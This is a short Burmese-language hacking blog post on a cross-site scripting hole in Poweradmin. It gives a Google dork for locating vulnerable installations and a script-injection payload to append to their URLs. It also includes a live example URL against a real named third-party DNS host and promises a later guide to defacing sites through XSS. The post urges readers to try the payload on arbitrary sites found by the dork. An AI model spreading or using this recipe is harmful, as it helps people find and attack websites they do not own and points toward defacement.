Poweradmin Cross Site Scripting

XSS Injection ဆုိတာက webSite Hacking

တည္းမွာလုပ္ရလြယ္ကူ တဲ့နည္းဆုိလည္း မမွားပါ

ဘူး။ ကဲဒီေတာ့ ကြ်န္ေတာ္ တုိ ့ စမ္းၾကတာေပ့ါဗ်ာ။

Google Dork:  "a complete(r) poweradmin - credits"  (သုိ ့မပာုတ္)


   "poweradmin - credits"

ကဲေကာင္းျပီ။ စလုိက္ရေအာင္ အရင္ဆုံး dork တစ္ခ်က္ရမ္းၾကည့္လုိက္ပါ။ web link ေတြ အားၾကီး က်လာျပီဆုိရင္

တစ္ဆုိဒ္ကို ကလစ္နုိပ္လုိက္ပါ။ ျပီးရင္ www.someone.com/index.php/>"><ScRiPt>alert(415833140173)</ScRiPt> 

အဲ့လုိေလးေနာက္က ထပ္ထုိးထည္ ့လုိက္ပါ။ မလုပ္တတ္ရင္အစမ္းအေနနဲ ့ေအာက္ကလင့္ကိုသြားၾကည့္ေပးပါ။

http://dns.gigenet.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E

 ကဲ အုိေကျပီေနာ္ ေဘာ္ဒါတုိ ့ xss ကို အသုံးမ၀င္ဘူး မေျပာပါနဲ ့ခင္ဗ်ာ။ xss ကလည္း Deface အုပ္တတ္ရင္ရပါတယ္။ မလုပ္တတ္ေသးရင္ေတာ့ ေနာက္ ဘေလာ့ တစ္ခုမွာ တင္ေပးပါ့မယ္။ How to deface xss ေပ့ါ။ခုေတာ့ ဒီေလာက္ပါဘဲ။



Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com